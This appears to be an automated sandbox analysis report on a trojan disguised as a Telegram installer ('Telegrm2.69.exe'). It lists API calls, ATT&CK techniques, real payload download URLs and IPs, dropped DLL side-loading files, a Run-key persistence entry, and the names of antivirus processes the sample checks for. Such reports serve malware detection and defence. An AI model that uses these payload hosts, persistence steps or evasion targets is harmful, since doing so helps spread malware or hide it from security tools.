Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 5_2_00000211DC4D4565 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00000211DC4D4565
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 5_2_00000211DC4D5518 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00000211DC4D5518
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_00007FF6E2D6FC70 cpuid 2_2_00007FF6E2D6FC70
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: EnumSystemLocalesA,0_2_030BD290
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: EnumSystemLocalesA,0_2_030BD1F8
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: _getptd,GetLocaleInfoA,GetLocaleInfoW,0_2_030BD0C8
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: GetLastError,free,free,GetLocaleInfoW,GetLocaleInfoW,free,GetLocaleInfoW,0_2_030B9FFC
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,free,0_2_030BE600
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: GetLocaleInfoW,0_2_030BCD68
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: _getptd,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoW,0_2_030BCDF8
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: _getptd,GetLocaleInfoA,0_2_030BCC80
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: GetLocaleInfoW,2_2_0000024B6459CD68
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,free,2_2_0000024B6459E600
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: _getptd,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoW,2_2_0000024B6459CDF8
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: GetLastError,free,free,GetLocaleInfoW,GetLocaleInfoW,free,GetLocaleInfoW,2_2_0000024B64599FFC
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: _getptd,GetLocaleInfoA,GetLocaleInfoW,2_2_0000024B6459D0C8
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: EnumSystemLocalesA,2_2_0000024B6459D1F8
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: EnumSystemLocalesA,2_2_0000024B6459D290
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: _getptd,GetLocaleInfoA,2_2_0000024B6459CC80
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: GetLocaleInfoA,2_2_00007FFDFB8B6D80
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: _getptd,GetLocaleInfoA,5_2_00000211DC4DCC80
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: GetLocaleInfoW,5_2_00000211DC4DCD68
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,free,5_2_00000211DC4DE600
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: _getptd,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoW,5_2_00000211DC4DCDF8
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: GetLastError,free,free,GetLocaleInfoW,GetLocaleInfoW,free,GetLocaleInfoW,5_2_00000211DC4D9FFC
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: _getptd,GetLocaleInfoA,GetLocaleInfoW,5_2_00000211DC4DD0C8
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: EnumSystemLocalesA,5_2_00000211DC4DD1F8
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: EnumSystemLocalesA,5_2_00000211DC4DD290
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_030B38A4 GetSystemTimeAsFileTime,0_2_030B38A4
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_030A3560 lstrcat,GetComputerNameA,GetCurrentProcessId,LoadLibraryA,GetProcAddress,GetUserNameA,CreateToolhelp32Snapshot,lstrlen,_localtime64,wsprintfA,GetModuleFileNameA,0_2_030A3560
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_030B74B8 _lock,_get_daylight,_get_daylight,_get_daylight,___lc_codepage_func,free,free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_030B74B8
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_030B83F4 HeapCreate,GetVersion,HeapSetInformation,0_2_030B83F4
Source: arphaCrashReport64.exe, arphaCrashReport64.exe, 00000005.00000002.2904377323.00000211DC4E8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000005.00000002.2904201868.00000211DC1D0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: bdagent.exe
Source: arphaCrashReport64.exe, arphaCrashReport64.exe, 00000005.00000002.2904377323.00000211DC4E8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000005.00000002.2904201868.00000211DC1D0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: kxetray.exe
Source: arphaCrashReport64.exe, arphaCrashReport64.exe, 00000005.00000002.2904377323.00000211DC4E8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000005.00000002.2904201868.00000211DC1D0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: avp.exe
Source: arphaCrashReport64.exe, arphaCrashReport64.exe, 00000005.00000002.2904377323.00000211DC4E8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000005.00000002.2904201868.00000211DC1D0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: 360tray.exe
Source: arphaCrashReport64.exe, arphaCrashReport64.exe, 00000005.00000002.2904377323.00000211DC4E8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000005.00000002.2904201868.00000211DC1D0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: avgnt.exe
Source: arphaCrashReport64.exe, arphaCrashReport64.exe, 00000005.00000002.2904377323.00000211DC4E8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000005.00000002.2904201868.00000211DC1D0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire Infrastructure1
Valid Accounts		1
Native API		1
DLL Side-Loading		1
DLL Side-Loading		1
Obfuscated Files or Information		121
Input Capture		2
System Time Discovery		Remote Services1
Archive Collected Data		12
Ingress Tool Transfer		Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts12
Service Execution		1
Valid Accounts		1
Valid Accounts		1
DLL Side-Loading		LSASS Memory1
Account Discovery		Remote Desktop Protocol121
Input Capture		1
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt12
Windows Service		1
Access Token Manipulation		1
Valid Accounts		Security Account Manager1
File and Directory Discovery		SMB/Windows Admin Shares3
Clipboard Data		11
Non-Standard Port		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCron1
Registry Run Keys / Startup Folder		12
Windows Service		1
Virtualization/Sandbox Evasion		NTDS23
System Information Discovery		Distributed Component Object ModelInput Capture2
Non-Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
Process Injection		1
Access Token Manipulation		LSA Secrets151
Security Software Discovery		SSHKeylogging12
Application Layer Protocol		Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
Registry Run Keys / Startup Folder		1
Process Injection		Cached Domain Credentials1
Virtualization/Sandbox Evasion		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync2
Process Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
Application Window Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
System Owner/User Discovery		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Telegrm2.69.exe5%VirustotalBrowse
Telegrm2.69.exe3%ReversingLabs

Dropped Files

SourceDetectionScannerLabelLink
C:\ProgramData\icret\arphaCrashReport64.exe0%ReversingLabs
C:\ProgramData\icret\arphaCrashReport64.exe0%VirustotalBrowse
C:\ProgramData\icret\arphaDump64.dll58%ReversingLabsWin64.Trojan.DllHijack
C:\ProgramData\icret\arphaDump64.dll47%VirustotalBrowse

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
jerryrat2024.oss-cn-beijing.aliyuncs.com0%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://crl.thawte.com/ThawteTimestampingCA.crl00%URL Reputationsafe
http://crl.thawte.com/ThawtePCA.crl00%URL Reputationsafe
http://www.symauth.com/rpa000%URL Reputationsafe
http://ocsp.thawte.com00%URL Reputationsafe
http://www.symauth.com/cps0(0%URL Reputationsafe
https://jerryrat2024.oss-cn-beijing.aliyuncs.com/arphaDump64.dllrs0%Avira URL Cloudsafe
http://jerryrat2024.oss-cn-beijing.aliyuncs.com/arphaCrashReport64.exe0%Avira URL Cloudsafe
http://cs-g2-crl.thawte.com/ThawteCSG2.crl00%Avira URL Cloudsafe
http://jerryrat2024.oss-cn-beijing.aliyuncs.com/arphaDump64.dll64.exeY0%Avira URL Cloudsafe
http://jerryrat2024.oss-cn-beijing.aliyuncs.com/arphaDump64.dll-0%Avira URL Cloudsafe
http://jerryrat2024.oss-cn-beijing.aliyuncs.com/00)r0%Avira URL Cloudsafe
https://jerryrat2024.oss-cn-beijing.aliyuncs.com/arphaDump64.dll0%Avira URL Cloudsafe
http://jerryrat2024.oss-cn-beijing.aliyuncs.com/arphaCrashReport64.exe0%VirustotalBrowse
http://jerryrat2024.oss-cn-beijing.aliyuncs.com:80/arphaCrashReport64.exe0%Avira URL Cloudsafe
https://www.virtualbox.org/0%Avira URL Cloudsafe
http://cs-g2-crl.thawte.com/ThawteCSG2.crl00%VirustotalBrowse
http://jerryrat2024.oss-cn-beijing.aliyuncs.com/arphaDump64.dll0%Avira URL Cloudsafe
http://jerryrat2024.oss-cn-beijing.aliyuncs.com/arphaCrashReport64.exeL0%Avira URL Cloudsafe
http://jerryrat2024.oss-cn-beijing.aliyuncs.com/#0%Avira URL Cloudsafe
https://jerryrat2024.oss-cn-beijing.aliyuncs.com/arphaDump64.dll0%VirustotalBrowse
http://jerryrat2024.oss-cn-beijing.aliyuncs.com/0%Avira URL Cloudsafe
https://www.virtualbox.org/0%VirustotalBrowse
http://jerryrat2024.oss-cn-beijing.aliyuncs.com:80/arphaDump64.dll0%Avira URL Cloudsafe
http://jerryrat2024.oss-cn-beijing.aliyuncs.com:80/arphaCrashReport64.exe0%VirustotalBrowse
http://jerryrat2024.oss-cn-beijing.aliyuncs.com/arphaDump64.dll1%VirustotalBrowse
http://jerryrat2024.oss-cn-beijing.aliyuncs.com/0%VirustotalBrowse
http://jerryrat2024.oss-cn-beijing.aliyuncs.com:80/arphaDump64.dll1%VirustotalBrowse
http://jerryrat2024.oss-cn-beijing.aliyuncs.com/#0%VirustotalBrowse

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
jerryrat2024.oss-cn-beijing.aliyuncs.com
39.97.203.40
truefalseunknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://jerryrat2024.oss-cn-beijing.aliyuncs.com/arphaDump64.dllrsTelegrm2.69.exe, 00000000.00000002.2903961019.00000000022F0000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://jerryrat2024.oss-cn-beijing.aliyuncs.com/arphaDump64.dll64.exeYTelegrm2.69.exe, 00000000.00000003.2372902793.000000000074B000.00000004.00000020.00020000.00000000.sdmp, Telegrm2.69.exe, 00000000.00000002.2903854396.000000000074B000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://jerryrat2024.oss-cn-beijing.aliyuncs.com/arphaCrashReport64.exeTelegrm2.69.exe, 00000000.00000003.2372902793.000000000074B000.00000004.00000020.00020000.00000000.sdmp, Telegrm2.69.exe, 00000000.00000002.2903854396.000000000074B000.00000004.00000020.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://cs-g2-crl.thawte.com/ThawteCSG2.crl0Telegrm2.69.exe, 00000000.00000002.2904259663.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Telegrm2.69.exe, 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000002.00000002.2904157690.0000024B64290000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000005.00000002.2904377323.00000211DC4E8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000005.00000002.2904201868.00000211DC1D0000.00000040.00001000.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0Telegrm2.69.exe, 00000000.00000002.2904259663.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Telegrm2.69.exe, 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000002.00000002.2904157690.0000024B64290000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000005.00000002.2904377323.00000211DC4E8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000005.00000002.2904201868.00000211DC1D0000.00000040.00001000.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
http://crl.thawte.com/ThawtePCA.crl0Telegrm2.69.exe, 00000000.00000002.2904259663.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Telegrm2.69.exe, 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000002.00000002.2904157690.0000024B64290000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000005.00000002.2904377323.00000211DC4E8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000005.00000002.2904201868.00000211DC1D0000.00000040.00001000.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
http://www.symauth.com/rpa00Telegrm2.69.exe, 00000000.00000002.2904259663.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Telegrm2.69.exe, 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000002.00000002.2904157690.0000024B64290000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000005.00000002.2904377323.00000211DC4E8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000005.00000002.2904201868.00000211DC1D0000.00000040.00001000.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
http://jerryrat2024.oss-cn-beijing.aliyuncs.com/arphaDump64.dll-Telegrm2.69.exe, 00000000.00000003.2372902793.000000000074B000.00000004.00000020.00020000.00000000.sdmp, Telegrm2.69.exe, 00000000.00000002.2903854396.000000000074B000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://jerryrat2024.oss-cn-beijing.aliyuncs.com/00)rTelegrm2.69.exe, 00000000.00000003.2372902793.000000000074B000.00000004.00000020.00020000.00000000.sdmp, Telegrm2.69.exe, 00000000.00000002.2903854396.000000000074B000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://jerryrat2024.oss-cn-beijing.aliyuncs.com/arphaDump64.dllTelegrm2.69.exe, 00000000.00000002.2903961019.00000000022F0000.00000004.00000020.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://jerryrat2024.oss-cn-beijing.aliyuncs.com:80/arphaCrashReport64.exeTelegrm2.69.exe, 00000000.00000003.2372902793.000000000074B000.00000004.00000020.00020000.00000000.sdmp, Telegrm2.69.exe, 00000000.00000002.2903854396.000000000074B000.00000004.00000020.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://ocsp.thawte.com0Telegrm2.69.exe, 00000000.00000002.2904259663.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Telegrm2.69.exe, 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000002.00000002.2904157690.0000024B64290000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000005.00000002.2904377323.00000211DC4E8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000005.00000002.2904201868.00000211DC1D0000.00000040.00001000.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://www.virtualbox.org/arphaCrashReport64.exe, 00000005.00000002.2904201868.00000211DC1D0000.00000040.00001000.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://jerryrat2024.oss-cn-beijing.aliyuncs.com/arphaDump64.dllTelegrm2.69.exe, 00000000.00000003.2372902793.000000000074B000.00000004.00000020.00020000.00000000.sdmp, Telegrm2.69.exe, 00000000.00000002.2903905533.0000000000782000.00000004.00000020.00020000.00000000.sdmp, Telegrm2.69.exe, 00000000.00000003.2372963839.000000000077F000.00000004.00000020.00020000.00000000.sdmp, Telegrm2.69.exe, 00000000.00000002.2903854396.000000000074B000.00000004.00000020.00020000.00000000.sdmp, Telegrm2.69.exe, 00000000.00000003.2372868566.000000000077A000.00000004.00000020.00020000.00000000.sdmpfalse
  • 1%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://jerryrat2024.oss-cn-beijing.aliyuncs.com/arphaCrashReport64.exeLTelegrm2.69.exe, 00000000.00000003.2372902793.000000000074B000.00000004.00000020.00020000.00000000.sdmp, Telegrm2.69.exe, 00000000.00000002.2903854396.000000000074B000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://www.symauth.com/cps0(Telegrm2.69.exe, 00000000.00000002.2904259663.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Telegrm2.69.exe, 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000002.00000002.2904157690.0000024B64290000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000005.00000002.2904377323.00000211DC4E8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000005.00000002.2904201868.00000211DC1D0000.00000040.00001000.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
http://jerryrat2024.oss-cn-beijing.aliyuncs.com/#Telegrm2.69.exe, 00000000.00000003.2372902793.000000000074B000.00000004.00000020.00020000.00000000.sdmp, Telegrm2.69.exe, 00000000.00000002.2903854396.000000000074B000.00000004.00000020.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://jerryrat2024.oss-cn-beijing.aliyuncs.com/Telegrm2.69.exe, 00000000.00000003.2372902793.000000000074B000.00000004.00000020.00020000.00000000.sdmp, Telegrm2.69.exe, 00000000.00000002.2903854396.000000000074B000.00000004.00000020.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://jerryrat2024.oss-cn-beijing.aliyuncs.com:80/arphaDump64.dllTelegrm2.69.exe, 00000000.00000003.2372902793.000000000074B000.00000004.00000020.00020000.00000000.sdmp, Telegrm2.69.exe, 00000000.00000002.2903854396.000000000074B000.00000004.00000020.00020000.00000000.sdmpfalse
  • 1%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown

World Map of Contacted IPs

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Public IPs

IPDomainCountryFlagASNASN NameMalicious
154.198.53.117
unknownSeychelles
26484IKGUL-26484USfalse
39.97.203.40
jerryrat2024.oss-cn-beijing.aliyuncs.comChina
37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse

General Information

Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1487486
Start date and time:2024-08-04 12:46:09 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 6m 57s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:8
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:Telegrm2.69.exe
Detection:MAL
Classification:mal60.troj.spyw.evad.winEXE@3/3@1/2
EGA Information:
  • Successful, ratio: 100%
HCA Information:
  • Successful, ratio: 73%
  • Number of executed functions: 72
  • Number of non-executed functions: 323
Cookbook Comments:
  • Found application associated with file extension: .exe

Warnings

  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
  • Not all processes where analyzed, report is missing behavior information
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size exceeded maximum capacity and may have missing network information.
  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

TimeTypeDescription
06:47:00API Interceptor4420x Sleep call for process: Telegrm2.69.exe modified
06:48:10API Interceptor6085x Sleep call for process: arphaCrashReport64.exe modified
11:47:10AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run pirxrm C:\ProgramData\icret\arphaCrashReport64.exe
11:47:18AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run pirxrm C:\ProgramData\icret\arphaCrashReport64.exe

Joe Sandbox View / Context

IPs

No context

Domains

MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
jerryrat2024.oss-cn-beijing.aliyuncs.comfile_6c73ff4553d147e39fc35434c1e9e972_2024-07-30_02_54_11_351000.zipGet hashmaliciousUnknownBrowse
  • 39.97.203.118
SvpnLong2.exeGet hashmaliciousUnknownBrowse
  • 39.97.203.118
SvpnLong2.exeGet hashmaliciousUnknownBrowse
  • 39.97.203.118
Cbrome1.0.exeGet hashmaliciousUnknownBrowse
  • 39.97.203.118
Supe.exeGet hashmaliciousUnknownBrowse
  • 39.97.203.118
Cbrome1.0.exeGet hashmaliciousUnknownBrowse
  • 39.97.203.118
7Y18r(111).exeGet hashmaliciousUnknownBrowse
  • 39.97.203.118
7Y18r(111).exeGet hashmaliciousUnknownBrowse
  • 39.97.203.118
SgSetup.exeGet hashmaliciousUnknownBrowse
  • 59.110.190.37
MFCApplication3.exeGet hashmaliciousUnknownBrowse
  • 59.110.190.37

ASNs

MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdv9.exeGet hashmaliciousUnknownBrowse
  • 47.97.21.5
f2.exeGet hashmaliciousBlackMoonBrowse
  • 120.26.110.170
f1.exeGet hashmaliciousUnknownBrowse
  • 120.26.110.170
1.exeGet hashmaliciousUnknownBrowse
  • 106.14.228.188
v9.exeGet hashmaliciousUnknownBrowse
  • 47.97.21.5
2.exeGet hashmaliciousPhisherBrowse
  • 139.196.119.59
Tomcat.bin.exeGet hashmaliciousUnknownBrowse
  • 203.107.1.33
b4cbf3ffbd8e152116e72487c3b16f1d.exeGet hashmaliciousUnknownBrowse
  • 203.107.1.33
uPrsrEVzMP.exeGet hashmaliciousCobaltStrikeBrowse
  • 39.101.36.167
Tomcat.bin.exeGet hashmaliciousUnknownBrowse
  • 203.107.1.33
IKGUL-26484USeqzAg8XVRw.elfGet hashmaliciousMiraiBrowse
  • 156.249.231.102
http://bandamazonas.com.br/Get hashmaliciousUnknownBrowse
  • 45.139.197.93
http://bandamazonas.com.br/Get hashmaliciousUnknownBrowse
  • 45.139.197.93
205.185.120.123-skid.arm7-2024-07-27T10_33_43.elfGet hashmaliciousMirai, MoobotBrowse
  • 156.249.231.182
205.185.120.123-skid.mpsl-2024-07-27T08_45_37.elfGet hashmaliciousMirai, MoobotBrowse
  • 156.247.139.136
https://bet958z.com/Get hashmaliciousUnknownBrowse
  • 154.198.53.36
94.156.8.9-skid.arm7-2024-07-23T17_40_10.elfGet hashmaliciousMirai, MoobotBrowse
  • 156.238.135.131
Fzfee1Lgc2.elfGet hashmaliciousUnknownBrowse
  • 154.205.223.22
7OFBdUtXsK.elfGet hashmaliciousMiraiBrowse
  • 156.229.33.55
209.141.61.182-skid.mpsl-2024-07-22T11_02_18.elfGet hashmaliciousMirai, MoobotBrowse
  • 156.249.231.121

JA3 Fingerprints

No context

Dropped Files

MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
C:\ProgramData\icret\arphaCrashReport64.exefile_6c73ff4553d147e39fc35434c1e9e972_2024-07-30_02_54_11_351000.zipGet hashmaliciousUnknownBrowse
    SvpnLong2.exeGet hashmaliciousUnknownBrowse
      SvpnLong2.exeGet hashmaliciousUnknownBrowse
        Cbrome1.0.exeGet hashmaliciousUnknownBrowse
          Supe.exeGet hashmaliciousUnknownBrowse
            Cbrome1.0.exeGet hashmaliciousUnknownBrowse
              Supe.exeGet hashmaliciousUnknownBrowse
                7Y18r(111).exeGet hashmaliciousUnknownBrowse
                  7Y18r(111).exeGet hashmaliciousUnknownBrowse
                    SgSetup.exeGet hashmaliciousUnknownBrowse
                      C:\ProgramData\icret\arphaDump64.dllfile_6c73ff4553d147e39fc35434c1e9e972_2024-07-30_02_54_11_351000.zipGet hashmaliciousUnknownBrowse
                        SvpnLong2.exeGet hashmaliciousUnknownBrowse
                          SvpnLong2.exeGet hashmaliciousUnknownBrowse
                            Cbrome1.0.exeGet hashmaliciousUnknownBrowse
                              Supe.exeGet hashmaliciousUnknownBrowse
                                7Y18r(111).exeGet hashmaliciousUnknownBrowse
                                  7Y18r(111).exeGet hashmaliciousUnknownBrowse
                                    SgSetup.exeGet hashmaliciousUnknownBrowse
                                      MFCApplication3.exeGet hashmaliciousUnknownBrowse
                                        MFCApplication3.exeGet hashmaliciousUnknownBrowse

                                          Created / dropped Files

                                          C:\ProgramData\icret\arphaCrashReport64.exe

                                          Download File
                                          Process:C:\Users\user\Desktop\Telegrm2.69.exe
                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                          Category:dropped
                                          Size (bytes):238384
                                          Entropy (8bit):6.278635939854228
                                          Encrypted:false
                                          SSDEEP:3072:fN9rZ5vuFomptSepjTxUPjfOgwXCtRLDya09M9EvoHmkQ/2Y8L6vVefD:rZ5qomPSeCx7tRNQjSfD
                                          MD5:8B5D51DF7BBD67AEB51E9B9DEE6BC84A
                                          SHA1:DD63C3D4ACF0CE27F71CCE44B8950180E48E36FA
                                          SHA-256:E743E8FAC075A379161E1736388451E0AF0FDE7DA595EA9D15EEB5140E3E8271
